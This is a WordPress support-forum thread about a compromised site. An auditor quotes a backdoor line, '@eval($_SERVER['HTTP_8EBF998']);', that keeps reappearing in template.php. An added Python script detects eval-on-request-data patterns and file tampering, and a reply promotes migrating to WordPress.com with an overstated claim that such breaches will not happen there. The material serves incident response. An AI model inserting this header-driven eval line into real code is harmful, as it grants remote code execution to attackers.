Suspicious eval() found in template.php – is this legitimate?

  •

    Hello,

    I’m currently auditing a WordPress site after a suspected security incident and I came across a line using eval() inside a template.php file (in the wp-includes folder).

    The line looks conceptually like this (simplified):
    @eval($_SERVER['HTTP_8EBF998']);

    From my understanding:

    • eval() is strongly discouraged in WordPress development
    • WordPress core does not use eval() in templates
    • Passing data derived from $_SERVER, headers, or request variables into eval() is typically considered remote code execution (RCE)

    I have already:

    • Replaced WordPress core files with clean originals
    • Verified plugins and themes against official sources
    • Checked server-level protections (WAF, permissions, uploads execution disabled)
    • Each time I delete the file and replace it with a clean version, the eval() line is automatically reinserted into the file within approximately 10 seconds.

    My questions are:

    1. Is there any legitimate use case where WordPress (core, themes, or reputable plugins) would intentionally place an eval() call inside a template file?
    2. Can this ever be considered safe, or should it always be treated as a compromise?
    3. If treated as malware, are there known patterns or plugins that historically injected code this way?

    I want to be absolutely sure before taking further cleanup steps.

    Any clarification from core contributors or experienced developers would be highly appreciated.

    Thank you.

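    As an added, defender-side example (not code from the original post or from WordPress), the script below does the two checks this situation calls for: it flags eval()/assert() calls whose argument is taken from a request-controlled superglobal such as $_SERVER, and it hashes a live tree against a clean copy and re-polls a file so a line that is reinserted seconds after cleanup shows up on the next check. The PHP sample is constructed for the demo and only borrows the header name from the snippet above; the directory paths in the usage comment are placeholders.

```python
"""Audit helpers for an injected eval() in a WordPress install (added example)."""
import hashlib
import re
import time
from pathlib import Path

# Constructed sample (not real core code): a clean-looking file with one injected line.
CONSTRUCTED_PHP = """<?php
/**
 * Template loading functions.
 */
function get_query_template( $type, $templates = array() ) {
    $type = preg_replace( '|[^a-z0-9-]+|', '', $type );
    return apply_filters( "{$type}_template", '', $type, $templates );
}
@eval($_SERVER['HTTP_8EBF998']);
"""

# eval()/assert() whose argument, on the same line, references a superglobal the
# client controls (headers land in $_SERVER as HTTP_*). The optional leading '@'
# silences PHP errors, a common trait of injected code.
SUSPICIOUS_EVAL = re.compile(
    r"@?\b(?:eval|assert)\s*\([^;]*?\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def find_suspicious_evals(source: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped_line) for each line that feeds request data into eval()/assert()."""
    return [
        (lineno, line.strip())
        for lineno, line in enumerate(source.splitlines(), start=1)
        if SUSPICIOUS_EVAL.search(line)
    ]


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def load_tree(root: Path, suffix: str = ".php") -> dict[str, str]:
    """Map each PHP file under root (path relative to root) to its SHA-256 digest."""
    return {
        str(p.relative_to(root)): sha256_of(p.read_bytes())
        for p in root.rglob(f"*{suffix}")
        if p.is_file()
    }


def diff_trees(clean: dict[str, str], live: dict[str, str]) -> dict[str, list[str]]:
    """Compare digest maps: files modified, files added to the live tree, files missing from it."""
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def poll_until_changed(read_bytes, baseline_digest: str, checks: int = 30,
                       interval: float = 1.0, sleep=time.sleep):
    """Re-hash a file `checks` times, `interval` seconds apart.

    Returns the check number at which the digest first diverged from the
    baseline (i.e. the file was re-modified after cleanup), or None if it stayed clean.
    """
    for i in range(1, checks + 1):
        if sha256_of(read_bytes()) != baseline_digest:
            return i
        sleep(interval)
    return None


if __name__ == "__main__":
    for lineno, text in find_suspicious_evals(CONSTRUCTED_PHP):
        print(f"suspicious line {lineno}: {text}")
    # Usage against a real site (placeholder paths):
    # report = diff_trees(load_tree(Path("/path/to/clean-wordpress")),
    #                     load_tree(Path("/var/www/site")))
    # target = Path("/var/www/site/wp-includes/template.php")
    # hit = poll_until_changed(target.read_bytes, sha256_of(target.read_bytes()), checks=30)
```

    The tree diff is what answers the "replaced core files but it comes back" problem: anything listed under "added" (for example a PHP file under wp-content/uploads) or "modified" outside the files you knowingly changed is a candidate for the process that rewrites template.php, and the poll confirms whether the reinjection is still happening after each cleanup step.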

  • Hello there,

    That eval() in template.php is definitely not supposed to be there, as you can see in the core file there’s no usage of eval(): https://core.trac.wordpress.org/browser/trunk/src/wp-includes/template.php

    Since your website is not hosted on WordPress.com, where this could not have happened due to our own security measures, I recommend opening this thread on the WordPress.org forums instead: https://wordpress.org/support/forums/

    If you’re interested in keeping your clients’ sites safer, you might want to consider moving them to WordPress.com, where we take care of security for you and such issues will not happen. In the very remote case that they do happen, our security team responds extremely fast, patching everything in the background, cleaning up, assessing the damage caused, and establishing measures to contact the affected users and future-proof the system.

    You can migrate for free here: https://wordpress.com/move/
